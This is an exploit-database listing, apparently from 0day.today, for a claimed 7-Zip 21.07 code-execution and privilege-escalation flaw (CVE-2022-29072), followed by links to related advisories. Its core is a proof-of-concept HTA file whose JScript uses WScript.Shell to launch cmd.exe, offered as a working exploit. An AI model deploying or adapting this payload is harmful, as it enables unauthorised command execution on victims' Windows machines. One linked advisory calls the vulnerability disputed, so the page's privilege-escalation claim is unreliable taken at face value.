Lucene search
Kağan Çapar1337DAY-ID-37647HistoryApr 19, 2022 - 12:00 a.m.
7-zip - Code Execution / Local Privilege Escalation Exploit
2022-04-1900:00:00
Kağan Çapar
0day.today
599
7-zip
code execution
local privilege escalation
windows 10
file extension
command execution
security vulnerability
EPSS
0.001
Percentile
49.9%
# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation
# Exploit Author: Kağan Çapar
# Vendor homepage: https://www.7-zip.org/
# Software link: https://www.7-zip.org/a/7z2107-x64.msi
# Version: 21.07 and all versions
# Tested On: Windows 10 Pro (x64)
# References: https://github.com/kagancapar/CVE-2022-29072
# About:
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.
# Proof of Concept:
<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>
Related
hivepro
hivepro
What will be the consequence of this disputed vulnerability in 7-ZIP?
2022-04-26 12:22:45
Weekly Threat Digest: 18 – 24 April 2022
2022-04-27 12:44:38
prion
prion
Design/Logic Flaw
2022-04-15 20:15:00
githubexploit
githubexploit
Exploit for Heap-based Buffer Overflow in 7-Zip
2022-04-18 17:08:43
Exploit for Heap-based Buffer Overflow in 7-Zip
2022-12-20 15:30:12
Exploit for Heap-based Buffer Overflow in 7-Zip
2022-04-18 18:59:01
cve
cve
CVE-2022-29072
2022-04-15 20:15:12
exploitdb
exploitdb
7-zip - Code Execution / Local Privilege Escalation
2022-04-19 00:00:00
vulnrichment
vulnrichment
CVE-2022-29072
2022-04-15 19:54:15
packetstorm
packetstorm
7-Zip 21.07 Code Execution / Privilege Escalation
2022-04-19 00:00:00
kaspersky
kaspersky
KLA12514 PE vulnerability in 7-Zip
2022-04-15 00:00:00
cvelist
cvelist
CVE-2022-29072
2022-04-15 19:54:15
nvd
nvd
CVE-2022-29072
2022-04-15 20:15:12